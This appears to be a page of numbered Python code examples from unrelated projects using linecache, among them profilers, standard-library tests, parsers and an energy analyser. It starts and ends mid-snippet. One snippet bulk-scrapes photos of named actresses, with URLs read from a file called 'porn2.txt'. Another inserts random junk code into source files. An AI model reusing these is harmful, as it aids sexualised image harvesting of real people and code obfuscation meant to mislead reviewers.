  t_file = open('temp.txt', 'r')
  for line in linecache.getlines("temp.txt"):
      # Strip javascript document.write wrappers and comment/markup lines
      # from the echoed output; print everything else without its newline.
      if(line[0:16]=="document.write('"):
          print line[16:-4]
      elif(line[0:18]=="document.writeln('"):
          print line[18:-4]
      elif(line[0]=="<"):
          pass
      elif(line[0:2]=="*/"):
          pass
      elif(line[0:2]=="/*"):
          pass
      else:
          print line[:-1]
Beispiel #28
0
def show_results(prof, stream=None):
    """Write a per-line memory-usage table for each code object profiled
    in `prof` to `stream` (default sys.stdout)."""
    if stream is None:
        stream = sys.stdout
    template = '%6s %12s   %-s'
    header = template % ('Line #', 'Mem usage', 'Line Contents')
    stream.write(header + '\n')
    stream.write('=' * len(header) + '\n')

    for code in prof.code_map:
        lines = prof.code_map[code]
        filename = code.co_filename
        # Map compiled files back to their .py source.
        if (filename.endswith(".pyc") or
            filename.endswith(".pyo")):
            filename = filename[:-1]
        all_lines = linecache.getlines(filename)
        sub_lines = inspect.getblock(all_lines[code.co_firstlineno-1:])
        linenos = range(code.co_firstlineno, code.co_firstlineno + len(sub_lines))
        lines_normalized = {}

        # move everything one frame up
        keys = lines.keys()
        keys.sort()
        lines_normalized[code.co_firstlineno+1] = lines[keys[0]]
        while len(keys) > 1:
            v = keys.pop(0)
            lines_normalized[v] = lines[keys[0]]

        for l in linenos:
            mem = ''
            if lines_normalized.has_key(l):
                mem = '%5.2f MB' % max(lines_normalized.get(l))
            line = linecache.getline(filename, l)
            stream.write(template % (l, mem, line))
Beispiel #29
0
    def test_getline(self):
        """Exercise linecache.getline() with bad inputs, real files on
        disk, importable modules, and a bogus package path."""
        getline = linecache.getline

        # Bad values for line number should return an empty string
        self.assertEqual(getline(FILENAME, 2**15), EMPTY)
        self.assertEqual(getline(FILENAME, -1), EMPTY)

        # Float values currently raise TypeError, should it?
        self.assertRaises(TypeError, getline, FILENAME, 1.1)

        # Bad filenames should return an empty string
        self.assertEqual(getline(EMPTY, 1), EMPTY)
        self.assertEqual(getline(INVALID_NAME, 1), EMPTY)

        # Check whether lines correspond to those from file iteration
        for entry in TESTS:
            filename = os.path.join(TEST_PATH, entry) + '.py'
            for index, line in enumerate(open(filename)):
                self.assertEqual(line, getline(filename, index + 1))

        # Check module loading
        for entry in MODULES:
            filename = os.path.join(MODULE_PATH, entry) + '.py'
            for index, line in enumerate(open(filename)):
                self.assertEqual(line, getline(filename, index + 1))

        # Check that bogus data isn't returned (issue #1309567)
        empty = linecache.getlines('a/b/c/__init__.py')
        self.assertEqual(empty, [])
def format_outer_frames(context=5, stack_start=None, stack_end=None, ignore_ipython=True):
    """Format the frames enclosing the current call into a printable stack.

    Collects the outer frames, normalizes each frame's filename (preferring
    the frame's ``__file__`` global, mapping ``.pyc`` back to ``.py``),
    attaches a window of *context* source lines around the active line, and
    renders the selected slice of records via ``format_records``.
    """
    LNUM_POS, LINES_POS, INDEX_POS = 2, 4, 5
    frame_records = inspect.getouterframes(inspect.currentframe())
    formatted = []

    for idx, record in enumerate(frame_records):
        frame, filename, line_no, func_name, _, _ = record
        # The frame's own __file__ is usually more reliable than the name
        # reported by getouterframes; it may be None mid-import, hence the
        # type check before using it.
        candidate = frame.f_globals.get("__file__", None)
        if isinstance(candidate, str):
            filename = candidate
            if filename.endswith(".pyc"):
                filename = filename[:-4] + ".py"
        # Hack to avoid printing the internals of IPython.
        if ignore_ipython and os.path.basename(filename) == "iplib.py" \
                and func_name in ("safe_execfile", "runcode"):
            break

        first_wanted = line_no - 1 - context // 2
        start = max(first_wanted, 0)
        snippet = linecache.getlines(filename)[start:start + context]
        # Pad with blank lines when the window ran off either end of the file.
        if first_wanted < 0:
            snippet = ["\n"] * -first_wanted + snippet
        snippet.extend(["\n"] * (context - len(snippet)))

        entry = list(frame_records[idx])
        entry[LNUM_POS] = line_no
        entry[INDEX_POS] = line_no - 1 - start
        entry[LINES_POS] = snippet
        formatted.append(tuple(entry))
    return "\n".join(format_records(formatted[stack_end:stack_start:-1]))
Beispiel #31
0
    def parse_variable(self):
        """Parse the variable-definition file at ``self.var_path``.

        The file is organized in blocks bounded by ``#`` marker lines: a
        block starts with ``#<file_name>``, followed by a comma-separated
        DLC list, then one variable per line (``name,unit`` or a bare name).
        Parsed data is accumulated into ``self.file_list``,
        ``self.vars_list``, ``self.vars_no_unit`` and ``self.file_dlc_var``.

        Raises:
            Exception: if the marker lines do not pair up (odd count).
        """

        lineNumber = 1

        with open(self.var_path, 'r') as f:

            lines = f.readlines()
            for line in lines:

                # Marker line such as '#name...' (more than a bare '#').
                if line.startswith('#') and len(line) > 1:
                    self.number_list.append(lineNumber)

                # A lone '#' with no newline — only possible on the final
                # line, since readlines() keeps '\n'.  `not len(line)` can
                # never fire for readlines() output; kept for safety.
                if (('#' in line) and (len(line) == 1)) or not len(line):
                    self.number_list.append(lineNumber)

                lineNumber += 1
        # print(len(self.number_list))

        if len(self.number_list) % 2 == 0:

            for j in range(len(self.number_list)):

                if j % 2 == 0:

                    # Each (even, odd) pair of marker line numbers bounds
                    # one block: start marker and end marker.
                    start = self.number_list[j]
                    end = self.number_list[j + 1]

                    # linecache line numbers are 1-based.
                    file_name = linecache.getline(self.var_path,
                                                  start).strip()[1:]
                    dlc_list = linecache.getline(self.var_path,
                                                 start + 1).strip().split(',')

                    if 'section'.upper() not in file_name.upper():

                        var_list = linecache.getlines(self.var_path)[start +
                                                                     1:end - 1]
                        # print(var_list)
                        vars_list = []
                        unit_list = []

                        var_no_unit = []

                        for var in var_list:

                            if "#" not in var:

                                if ',' in var:
                                    temp = var.strip().split(',')

                                    vars_list.append(temp[0])
                                    unit_list.append(temp[1])
                                    self.vars_list.append(temp[0])

                                else:
                                    # No unit attached to this variable.
                                    temp = var.strip()
                                    var_no_unit.append(temp)

                        self.file_list.append(file_name)

                        if var_no_unit:

                            self.vars_no_unit[file_name] = var_no_unit

                        self.file_dlc_var[file_name] = [
                            dlc_list, vars_list, unit_list
                        ]
                    else:
                        # 'SECTION' blocks carry an extra trailing line with
                        # the section names, so the variable span is shorter.
                        var_list = linecache.getlines(self.var_path)[start +
                                                                     1:end - 2]
                        # print(var_list)
                        vars_list = []
                        unit_list = []

                        section = linecache.getlines(
                            self.var_path)[end - 2:end - 1][0]
                        section = section.strip().split(',')[1:]

                        var_no_unit = []

                        for var in var_list:

                            if "#" not in var:
                                if ',' in var:
                                    temp = var.strip().split(',')

                                    vars_list.append(temp[0])
                                    unit_list.append(temp[1])

                                    self.vars_list.append(temp[0])
                                else:
                                    temp = var.strip()
                                    var_no_unit.append(temp)
                            else:
                                pass

                        self.file_list.append(file_name)

                        if var_no_unit:
                            self.vars_no_unit[file_name] = var_no_unit

                        self.file_dlc_var[file_name] = [
                            dlc_list, vars_list, unit_list, section
                        ]

            # for key, value in self.file_dlc_var.items():
            #     print(key, value)

        else:
            print('variable definition file is not valid!')
            raise Exception('Please check the variable definition file!')
Beispiel #32
0
def read_dat_file(datf):
    """Parse a force-field parameter .dat file into a Parms object.

    Reads mass, bond, angle, dihedral, improper, nonbonded (and optional
    LJEDIT) sections via linecache, validates that the sections appear in
    the expected order with the expected spacing, expands equivalent-atom
    nonbonded entries, and returns the merged ``Parms`` container.

    Raises:
        pymsmtError: if the section layout of the file looks wrong.
    """
    #Read the parameter into dicts
    massparms = {}
    bondparms = {}
    angparms = {}
    dihparms = {}
    impparms = {}
    nbparms = {}
    ljedparms = {}
    hasljed = False

    count = len(linecache.getlines(datf))
    # Fixed: was Py2-only `xrange` (NameError on Py3); the rest of this
    # function already uses `range`.
    for i in range(2, count + 1):

        rline = linecache.getline(datf, i)
        line = rline.strip()

        # Locate the section boundaries: nonbonded start (MOD4 RE),
        # optional LJEDIT start, and the terminating END line.
        if (line[0:4] == 'MOD4') and (line.split()[1] == 'RE'):
            nbbln = i
        if (line[0:4] == 'LJED'):
            hasljed = True
            ljedbln = i
        if line[0:3] == 'END':
            nbeln = i
            break

    massln = []
    bondln = []
    angln = []
    dihln = []
    impln = []

    # Read from mass to improper parameters
    for i in range(2, nbbln):

        rline = linecache.getline(datf, i)
        line = rline.strip()

        mass_match = _massre.match(line)
        bond_match = _bondre.match(line)
        ang_match = _angre.match(line)
        dih_match = _dihre.match(line)
        imp_match = _impre.match(line)

        if line:
            if mass_match:
                massparms = readmass(massparms, line)
                massln.append(i)
            elif bond_match:
                bondparms = readbond(bondparms, line)
                bondln.append(i)
            elif ang_match:
                angparms = readang(angparms, line)
                angln.append(i)
            elif dih_match:
                dihparms = readdih(dihparms, line)
                dihln.append(i)
            elif imp_match:
                impparms = readimp(impparms, line)
                impln.append(i)

    massln0, massln1 = (min(massln), max(massln))
    bondln0, bondln1 = (min(bondln), max(bondln))
    angln0, angln1 = (min(angln), max(angln))
    dihln0, dihln1 = (min(dihln), max(dihln))
    impln0, impln1 = (min(impln), max(impln))

    # Sanity-check the gaps between consecutive sections; anything else
    # suggests different parameter types were mixed in one section.
    if (bondln0 - massln1 == 3) and (angln0 - bondln1 == 2) \
        and (dihln0 - angln1 == 2) and (impln0 - dihln1 == 2) and (nbbln - impln1 > 2):
        pass
    else:
        raise pymsmtError(
            'Error of reading the .dat file! Please check it whether '
            'it has different parameter types mixed in one section!')

    # Read the NB
    if hasljed is True:
        for i in range(nbbln + 1, ljedbln):
            rline = linecache.getline(datf, i)
            line = rline.strip()
            if line:
                nbparms = readnb(nbparms, line)
        for i in range(ljedbln + 1, nbeln):
            rline = linecache.getline(datf, i)
            line = rline.strip()
            if line:
                ljedparms = readljed(ljedparms, line)
    else:
        for i in range(nbbln + 1, nbeln):
            rline = linecache.getline(datf, i)
            line = rline.strip()
            if line:
                nbparms = readnb(nbparms, line)

    # Deal with the equil atoms
    eqdict = {}
    for i in range(nbbln - 3, nbbln):
        rline = linecache.getline(datf, i)
        line = rline.strip()
        if line and rline[0] != ' ':
            eqdict = readeqnb(eqdict, line)

    for i in list(eqdict.keys()):
        for j in eqdict[i]:
            if len(i) == 1:
                # Single-letter atom types are stored with a padding space.
                nbparms[j] = nbparms[i + ' ']
            else:
                nbparms[j] = nbparms[i]

    # Merge all the parameters into one dict
    parmdict = Parms(massparms, bondparms, angparms, dihparms, impparms,
                     nbparms, ljedparms)
    linecache.clearcache()

    return parmdict
Beispiel #33
0
def _parse_lambda(lam):
    """Returns the AST and source code of given lambda function.

  Args:
    lam: types.LambdaType, Python function/method/class

  Returns:
    gast.AST, Text: the parsed AST node; the source code that was parsed to
    generate the AST (including any prefixes that this function may have added).
  """
    # TODO(mdan): Use a fast path if the definition is not multi-line.
    # We could detect that the lambda is in a multi-line expression by looking
    # at the surrounding code - an surrounding set of parentheses indicates a
    # potential multi-line definition.

    mod = inspect.getmodule(lam)
    f = inspect.getsourcefile(lam)
    def_line = lam.__code__.co_firstlineno

    # This method is more robust that just calling inspect.getsource(mod), as it
    # works in interactive shells, where getsource would fail. This is the
    # same procedure followed by inspect for non-modules:
    # https://github.com/python/cpython/blob/3.8/Lib/inspect.py#L772
    lines = linecache.getlines(f, mod.__dict__)
    source = ''.join(lines)

    # Narrow down to the last node starting before our definition node.
    all_nodes = parse(source, preamble_len=0, single_node=False)
    search_nodes = []
    for node in all_nodes:
        # Also include nodes without a line number, for safety. This is defensive -
        # we don't know whether such nodes might exist, and if they do, whether
        # they are not safe to skip.
        # TODO(mdan): Replace this check with an assertion or skip such nodes.
        if getattr(node, 'lineno', def_line) <= def_line:
            search_nodes.append(node)
        else:
            # Found a node starting past our lambda - can stop the search.
            break

    # Extract all lambda nodes from the shortlist.
    lambda_nodes = []
    for node in search_nodes:
        lambda_nodes.extend(n for n in gast.walk(node)
                            if isinstance(n, gast.Lambda))

    # Filter down to lambda nodes which span our actual lambda.
    candidates = []
    for ln in lambda_nodes:
        # Compute the (min, max) line span covered by this lambda's subtree.
        minl, maxl = MAX_SIZE, 0
        for n in gast.walk(ln):
            minl = min(minl, getattr(n, 'lineno', minl))
            lineno = getattr(n, 'lineno', maxl)
            end_lineno = getattr(n, 'end_lineno', None)
            if end_lineno is not None:
                # end_lineno is more precise, but lineno should almost always work too.
                lineno = end_lineno
            maxl = max(maxl, lineno)
        if minl <= def_line <= maxl:
            candidates.append((ln, minl, maxl))

    # Happy path: exactly one node found.
    if len(candidates) == 1:
        (node, minl, maxl), = candidates  # pylint:disable=unbalanced-tuple-unpacking
        return _without_context(node, lines, minl, maxl)

    elif not candidates:
        raise errors.UnsupportedLanguageElementError(
            'could not parse the source code of {}:'
            ' no matching AST found'.format(lam))

    # Attempt to narrow down selection by signature is multiple nodes are found.
    matches = [v for v in candidates if _node_matches_argspec(v[0], lam)]
    if len(matches) == 1:
        (node, minl, maxl), = matches
        return _without_context(node, lines, minl, maxl)

    # Give up if could not narrow down to a single node.
    # Format the ambiguous matches into the error message to aid debugging.
    matches = '\n'.join('Match {}:\n{}\n'.format(
        i, unparse(node, include_encoding_marker=False))
                        for i, (node, _, _) in enumerate(matches))
    raise errors.UnsupportedLanguageElementError(
        'could not parse the source code of {}: found multiple definitions with'
        ' identical signatures at the location. This error'
        ' may be avoided by defining each lambda on a single line and with'
        ' unique argument names.\n{}'.format(lam, matches))
Beispiel #34
0
 def test_lazycache_no_globals(self):
     """lazycache() without module globals must refuse to register the file
     while leaving the regular cache contents intact."""
     cached_lines = linecache.getlines(FILENAME)
     linecache.clearcache()
     self.assertEqual(False, linecache.lazycache(FILENAME, None))
     self.assertEqual(cached_lines, linecache.getlines(FILENAME))
Beispiel #35
0
    # NOTE(review): orphaned fragment — the enclosing `def` was lost when
    # this snippet was extracted.  Appends the first matched article URL
    # to the output text file.
    if len(resurl) > 0:
        with open('赵丽颖.txt', 'a', encoding='utf-8') as file:
            file.write('http://www.mingtuiw.com'+resurl[0])
            file.write('\n')


def getList():
    """Walk listing pages 1..19 and hand each page URL to getTitle().

    Failures are logged and skipped so one bad page does not abort the crawl.
    """
    for i in range(1, 20):
        link = 'http://www.mingtuiw.com/archives/category/演员/迪丽热巴/page/' + str(i)
        try:
            getTitle(link)
        except Exception:
            # Was a bare `except:`, which would also swallow
            # KeyboardInterrupt/SystemExit.
            logging.debug('TitleError' + link)

def downPhoto(link):
    """Download one image URL (trailing newline stripped) to the local
    photo directory; any failure is logged and swallowed."""
    try:
        r = requests.get(link[:-1], headers=headers, timeout=3)
        # `with` guarantees the file handle is closed; the original left
        # `fw` open (only the HTTP response was closed).
        with open('F:\leg\dlrb\ ' + link[51:-13] + '.jpg', 'wb') as fw:
            fw.write(r.content)
        r.close()
    except Exception:
        # Was a bare `except:`; narrow to Exception so Ctrl-C still works.
        logging.debug(link + 'is wrong')


pool = ThreadPool(4)  # dual-core machine
tot_page = []
# Renamed from `str`: binding the list to `str` shadowed the builtin and
# made every later str() call (e.g. throughout main()) raise TypeError.
photo_links = linecache.getlines('porn2.txt')
pool.map(downPhoto, photo_links)  # download in parallel worker threads
pool.map(getTitle, tot_page)
pool.close()
pool.join()
def main(argv):  #argv[1]
    """Correlate per-function enter/exit timestamps with RAPL energy samples.

    argv[0]: function-timing file, lines of "<timestamp> <1|-1> <funcname>"
             (1 = enter, -1 = exit).
    argv[1]: rapl sample file, lines of "<timestamp> p0=.. p1=.. d0=.. d1=..".
    argv[2]: basename for the two output files (.funpower / .treegrid).

    For every function entry, finds the matching exit (handling recursive /
    same-named nested calls), apportions the energy of the overlapping RAPL
    intervals to the call, writes a CSV-ish .funpower file and an
    easyui-treegrid JSON file with parent/child call nesting.
    """
    print('参数1是函数时间信息的文件名,2是rapl数据', argv[0], argv[1])
    funSumPowerList = []
    funPowerList = []
    treegriddataList = []

    funTimeData = linecache.getlines(argv[0])
    raplData = linecache.getlines(argv[1])
    print(len(raplData))
    #lenfunTimeData=len(funTimeData)
    index = 0
    for i in range(1, (len(funTimeData) + 1)):
        # i runs 1..len — linecache line numbers are 1-based (line 0 is empty)
        tmpline = linecache.getline(argv[0], i)

        tmpline = tmpline.strip()
        ft1 = ft2 = 0
        if tmpline.split(' ')[1] == '1':
            #print(i,tmpline)

            ft1 = int(tmpline.split(' ')[0])
            funname = tmpline.split(' ')[2]
            tmp = 0
            # `chongming` ("same name") counts nested calls to the same
            # function so the correct matching exit record is picked.
            chongming = 0
            # find the end timestamp of this function call
            # linecache has no line 0, so mind the off-by-one between its
            # 1-based numbering and the 0-based iteration below
            for j in funTimeData:
                if tmp <= (i - 1):
                    tmp = tmp + 1
                    continue
                if j.split(' ')[1] == '1':  # the flag is either 1 or -1
                    if j.split(' ')[2].strip() == funname:
                        chongming = chongming + 1
                    tmp = tmp + 1
                elif j.split(' ')[2].strip() == funname:
                    if chongming == 0:
                        ft2 = int(j.split(' ')[0])
                        #print j
                        break
                    else:
                        chongming = chongming - 1
                        continue

            # Locate the RAPL sample intervals containing entry (ft1) and
            # exit (ft2): [pt11, pt12] and [pt21, pt22].
            pt11 = pt12 = pt21 = pt22 = 0
            tmptime1 = tmptime2 = 0
            for k in raplData:
                tmptime2 = int(k.split(' ')[0])
                if ft1 >= tmptime1 and ft1 <= tmptime2:
                    pt11 = tmptime1
                    pt12 = tmptime2
                if ft2 >= tmptime1 and ft2 <= tmptime2:
                    pt21 = tmptime1
                    pt22 = tmptime2
                    break
                tmptime1 = int(k.split(' ')[0])

            #print (ft1,ft2,funname,pt11,pt12,pt21,pt22)

            # compute the energy consumed by the call on line i
            p0 = p1 = d0 = d1 = 0.0
            if (pt11 == pt21 and pt12 == pt22):
                # Entry and exit fall inside a single RAPL interval:
                # apportion that interval's energy by time fraction.
                for m in raplData:
                    tmpt = int(m.split(' ')[0])
                    #1534238755593453 p0=21789550 p1=23132324 d0=4180908 d1=4180908
                    if tmpt == pt22:
                        tmpdata = pdataconvert(m.strip())
                        #print m
                        p0 = tmpdata[0] * 1.0 * (ft2 - ft1) / (pt22 - pt21)
                        p1 = tmpdata[1] * 1.0 * (ft2 - ft1) / (pt22 - pt21)
                        d0 = tmpdata[2] * 1.0 * (ft2 - ft1) / (pt22 - pt21)
                        d1 = tmpdata[3] * 1.0 * (ft2 - ft1) / (pt22 - pt21)
                        break
            else:
                # Call spans several intervals: partial first interval,
                # whole middle intervals, partial last interval.
                tmptime1 = tmptime2 = 0
                for m in raplData:
                    tmpt = int(m.split(' ')[0])
                    if tmpt == pt12:
                        #print m
                        tmpdata = pdataconvert(m.strip())
                        p0 = tmpdata[0] * 1.0 * (pt12 - ft1) / (pt12 - pt11)
                        p1 = tmpdata[1] * 1.0 * (pt12 - ft1) / (pt12 - pt11)
                        d0 = tmpdata[2] * 1.0 * (pt12 - ft1) / (pt12 - pt11)
                        d1 = tmpdata[3] * 1.0 * (pt12 - ft1) / (pt12 - pt11)
                        continue
                    if tmpt > pt12 and tmpt < pt21:
                        #print m
                        tmpdata = pdataconvert(m.strip())
                        p0 += tmpdata[0] * 1.0
                        p1 += tmpdata[1] * 1.0
                        d0 += tmpdata[2] * 1.0
                        d1 += tmpdata[3] * 1.0
                        continue
                    if tmpt == pt22:
                        #print m
                        tmpdata = pdataconvert(m.strip())
                        p0 += tmpdata[0] * 1.0 * (ft2 - pt21) / (pt22 - pt21)
                        p1 += tmpdata[1] * 1.0 * (ft2 - pt21) / (pt22 - pt21)
                        d0 += tmpdata[2] * 1.0 * (ft2 - pt21) / (pt22 - pt21)
                        d1 += tmpdata[3] * 1.0 * (ft2 - pt21) / (pt22 - pt21)
                        break
            # per-call energy; could also be appended to a file here
            # (this path runs many times)
            #funPowerList.append([funname,p0,p1,d0,d1])
            #print funname,p0,p1,d0,d1
            funPowerList.append([
                str(ft1),
                str(ft2), funname,
                str(p0),
                str(p1),
                str(d0),
                str(d1)
            ])
            #funPowerList.append([str(ft1),str(ft2),funname,str(p0),str(p1),str(d0),str(d1)])
            #treegriddataList
            #treegriddataList.append()
            #print funPowerList
    # save the results to a file
    print("将结果保存到文件,文件名为 参数3.funpower.时间 \n")
    currenttime = time.localtime(time.time())
    fw = open(
        argv[2] + ".funpower" + str(currenttime.tm_mon) +
        str(currenttime.tm_mday) + str(currenttime.tm_hour) +
        str(currenttime.tm_min), 'w')
    #fw.writelines(['#!/usr/bin/env sh\n'])
    for i in funPowerList:
        #[funname,p0,p1,d0,d1]
        #fw.writelines([i,'\n'])
        fw.writelines([
            i[0], ',', i[1], ',', i[2], ',', i[3], ',', i[4], ',', i[5], ',',
            i[6]
        ])
        fw.writelines(['\n'])
    fw.close()

    print('生成treegrid data...')
    '''
	name_age={"da_wang":27,"liu":26,"kong":12}用dict表示刚好,但注意dict中是单引号
	
	{"id":11,"name":"fun1","power":"111,1111,2222,333","_parentId":0},
	{"id":0,"name":"functions"},
	{"id":11,"region":"Albin","f1":2000,"f2":1800,"f3":1903,"f4":2183,"f5":2133,"f6":1923,"f7":2018,"f8":1838,"_parentId":1},
	{"id":2,"region":"Washington"},
	{"id":21,"region":"Bellingham","f1":2000,"f2":1800,"f3":1903,"f4":2183,"f5":2133,"f6":1923,"f7":2018,"f8":1838,"_parentId":2},
	{"id":24,"region":"Monroe","f1":2000,"f2":1800,"f3":1903,"f4":2183,"f5":2133,"f6":1923,"f7":2018,"f8":1838,"_parentId":2}
	],"footer":[
	{"region":"Total","f1":14000,"f2":12600,"f3":13321,"f4":15281,"f5":14931,"f6":13461,"f7":14126,"f8":12866}
]}
	'''
    filename = argv[2] + ".treegrid" + str(currenttime.tm_mon) + str(
        currenttime.tm_mday) + str(currenttime.tm_hour) + str(
            currenttime.tm_min)
    fw = open(filename, 'w')
    print('save to ' + filename)
    fw.writelines(['''{"total":''' + str(len(funPowerList)) + ''',"rows":['''])
    fw.writelines(['\n'])

    tsum = p0sum = p1sum = d0sum = d1sum = 0.0  # running totals
    funPowerList2 = funPowerList
    #print( 'fnname\ttime(us)\tp0\tp1\td0\td1'  )
    #print( '%20s %12s %12s %12s %12s %12s'  )%('fnname','time(us)','p0','p1','d0','d1') #python2
    print('%20s %12s %12s %12s %12s %12s' %
          ('fnname', 'time(us)', 'p0', 'p1', 'd0', 'd1'))  #python3
    for i, v in enumerate(funPowerList):
        parentID = 0
        #print i,v  # i starts at 0
        #[time1,time2,funname,p0,p1,d0,d1]
        ftime1 = int(v[0])
        ftime2 = int(v[1])
        # A call strictly contained in another call's time span is its child.
        #for i2,v2 in enumerate(funPowerList[(i+1):]):  # i2 would also start at 0, losing the row number
        for i2, v2 in enumerate(funPowerList):
            ftime3 = int(v2[0])
            ftime4 = int(v2[1])
            if ftime3 < ftime1 and ftime2 < ftime4:
                parentID = i2 + 1
                continue
            if ftime2 < ftime3:
                break
        if parentID != 0:
            #string='''{'id':'''+ str(i+1)+ ''','name':'''+v[2]+''','p0':'''+i[3]+''','p1':'''+i[4]+''','d0':'''+i[5]+''','d1':'''+i[6]+''','_parentId':'''+str(parentID)+'}'
            #fw.writelines([str({'id':i+1,'name':v[2],'p0':i[3],'p1':i[4],'d0':i[5],'d1':i[6],'_parentId':parentID})])
            #tmpdict={'id':(i+1),'name':v[2],'p0':v[3],'p1':v[4],'d0':v[5],'d1':v[6],'_parentId':parentID}
            tmpdict = {
                'id': (i + 1),
                'name': v[2],
                't': time2kexue(ftime2 - ftime1),
                'p0': '%.3e' % (float(v[3])),
                'p1': '%.3e' % (float(v[4])),
                'd0': '%.3e' % (float(v[5])),
                'd1': '%.3e' % (float(v[6])),
                '_parentId': parentID
            }
        else:
            # Top-level call: add it to the grand totals.
            p0sum += float(v[3])
            p1sum += float(v[4])
            d0sum += float(v[5])
            d1sum += float(v[6])
            tsum += float(ftime2 - ftime1)
            tmpdict = {
                'id': (i + 1),
                'name': v[2],
                't': time2kexue(ftime2 - ftime1),
                'p0': '%.3e' % (float(v[3])),
                'p1': '%.3e' % (float(v[4])),
                'd0': '%.3e' % (float(v[5])),
                'd1': '%.3e' % (float(v[6]))
            }
        # JSON does not accept single quotes — convert them to double quotes
        fw.writelines([str(tmpdict).replace('\'', '"'), '\n'])
        #print( tmpdict['name']+'\t'+tmpdict['t']+'\t'+tmpdict['p0']+'\t'+tmpdict['p1']+'\t'+tmpdict['d0']+'\t'+tmpdict['d1']  )
        #print( '%20s %12s %12s %12s %12s %12s'  )%(tmpdict['name'],tmpdict['t'],tmpdict['p0'],tmpdict['p1'],tmpdict['d0'],tmpdict['d1']) #python2
        print('%20s %12s %12s %12s %12s %12s' %
              (tmpdict['name'], tmpdict['t'], tmpdict['p0'], tmpdict['p1'],
               tmpdict['d0'], tmpdict['d1']))  #python3
        if i + 1 != len(funPowerList):
            fw.writelines([','])
        #treegriddataList.append()

    #],"footer":[{"name":"Total Energy:","persons":7,"iconCls":"icon-sum"} ]}
    #fw.writelines([']}']) #this variant omits the totals footer
    #print('{"name":"Total Energy:","p0":"%.f","p1":"%.f","d0":"%.f","d1":"%.f"} ]}'%(float(p0sum),float(p1sum),float(d0sum),float(d1sum),))
    print(
        '----\n%20s %12s   %.4e   %.4e   %.4e   %.4e' % (
            'sum',
            time2kexue(tsum),
            float(p0sum),
            float(p1sum),
            float(d0sum),
            float(d1sum),
        )
    )  # #python3  print('{"name":"Total Energy:","p0":"%.f","p1":"%.f","d0":"%.f","d1":"%.f"} ]}'%(float(p0sum),float(p1sum),float(d0sum),float(d1sum),))
    fw.writelines([
        '],"footer":[{"name":"Total Energy:","t":"%s","p0":"%.3e","p1":"%.3e","d0":"%.3e","d1":"%.3e"} ]}'
        % (
            time2kexue(tsum),
            float(p0sum),
            float(p1sum),
            float(d0sum),
            float(d1sum),
        )
    ])
    fw.close()
    print('over.')
def pdataconvert(p):
    """Parse a RAPL sample line like
    '1534238755593453 p0=21789550 p1=23132324 d0=4180908 d1=4180908'
    into the four integer counters [p0, p1, d0, d1]."""
    fields = p.split(' ')
    # Field 0 is the timestamp; fields 1-4 are key=value counters.
    return [int(fields[k].split('=')[1]) for k in (1, 2, 3, 4)]


if __name__ == "__main__":
    # Usage reminder printed before running (argv[2] names the output files).
    print("参数3 保存结果的文件名加个funpower >>log.txt")
    main(sys.argv[1:])  # argv[0] is the script name and is not passed to main()
'''
linecache.getlines(filename)
从名为filename的文件中得到全部内容,输出为列表格式,以文件每行为列表中的一个元素,并以linenum-1为元素在列表中的位置存储

linecache.getline(filename,lineno)
从名为filename的文件中得到第lineno行。这个函数从不会抛出异常——产生错误时它将返回 ''(空字符串),换行符将包含在找到的行里。
如果文件没有找到,这个函数将会在sys.path搜索。

>>> import time
>>> print time.time()
1518068251.33
>>> time = time.localtime(time.time())
>>> print time
time.struct_time(tm_year=2018, tm_mon=2, tm_mday=8, tm_hour=13, tm_min=37, tm_sec=31, tm_wday=3, tm_yday=39, tm_isdst=0)
>>> print time.tm_year
2018
Beispiel #38
0
    def write_results(self, show_missing=True, summary=False, coverdir=None):
        """Write trace/coverage results collected in this object.

        Prints the called functions and calling relationships (when
        collected), then writes one annotated ``<module>.cover`` file per
        traced source file and optionally a per-module summary.

        @param show_missing  annotate executable lines that were never hit
        @param summary       print a lines/percent summary per module
        @param coverdir      directory for the .cover files; default is next
                             to each source file
        """
        if self.calledfuncs:
            print()
            print("functions called:")
            calls = self.calledfuncs.keys()
            for filename, modulename, funcname in sorted(calls):
                print(("filename: %s, modulename: %s, funcname: %s" %
                       (filename, modulename, funcname)))

        if self.callers:
            print()
            print("calling relationships:")
            lastfile = lastcfile = ""
            for ((pfile, pmod, pfunc), (cfile, cmod, cfunc)) \
                    in sorted(self.callers.keys()):
                if pfile != lastfile:
                    print()
                    print("***", pfile, "***")
                    lastfile = pfile
                    lastcfile = ""
                if cfile != pfile and lastcfile != cfile:
                    print("  -->", cfile)
                    lastcfile = cfile
                print("    %s.%s -> %s.%s" % (pmod, pfunc, cmod, cfunc))

        # turn the counts data ("(filename, lineno) = count") into something
        # accessible on a per-file basis
        per_file = {}
        for filename, lineno in self.counts.keys():
            lines_hit = per_file[filename] = per_file.get(filename, {})
            lines_hit[lineno] = self.counts[(filename, lineno)]

        # accumulate summary info, if needed
        sums = {}

        for filename, count in per_file.items():
            if self.is_ignored_filename(filename):
                continue

            # Map compiled files back to their source file.
            if filename.endswith((".pyc", ".pyo")):
                filename = filename[:-1]

            if coverdir is None:
                dir = os.path.dirname(os.path.abspath(filename))
                modulename = modname(filename)
            else:
                dir = coverdir
                if not os.path.exists(dir):
                    os.makedirs(dir)
                modulename = fullmodname(filename)

            # If desired, get a list of the line numbers which represent
            # executable content (returned as a dict for better lookup speed)
            if show_missing:
                lnotab = find_executable_linenos(filename)
            else:
                lnotab = {}

            source = linecache.getlines(filename)
            coverpath = os.path.join(dir, modulename + ".cover")
            n_hits, n_lines = self.write_results_file(coverpath, source,
                                                      lnotab, count)

            if summary and n_lines:
                percent = int(100 * n_hits / n_lines)
                sums[modulename] = n_lines, percent, modulename, filename

        if summary and sums:
            print("lines   cov%   module   (path)")
            for m in sorted(sums.keys()):
                n_lines, percent, modulename, filename = sums[m]
                print("%5d   %3d%%   %s   (%s)" % sums[m])

        if self.outfile:
            # try and store counts and module info into self.outfile
            try:
                pickle.dump((self.counts, self.calledfuncs, self.callers),
                            open(self.outfile, 'wb'), 1)
            except IOError as err:
                print("Can't save counts files because %s" % err,
                      file=sys.stderr)
def insert_garbage_code(path):
    """Randomly insert no-op API call lines into source files under *path*.

    Insertion points are described by 'insert.yaml' (file + method patterns);
    junk lines are drawn from the API list at config.method_api_out_path and
    appended after randomly chosen statements inside the matched methods.
    """
    def get_random_api_text():
        # Pick a random API line and append a random comment so that every
        # inserted line is textually unique.
        text = random.choice(api)
        return '{0}//{1}'.format(
            text.replace('\n', ''), ''.join(
                random.sample(text, random.randint(8, 16))).replace('\n',
                                                                    '')) + '\n'

    def roll():
        # 1-in-3 chance of inserting at a given candidate line.
        return random.choice([True, False, False])

    def skip_num(line):
        """
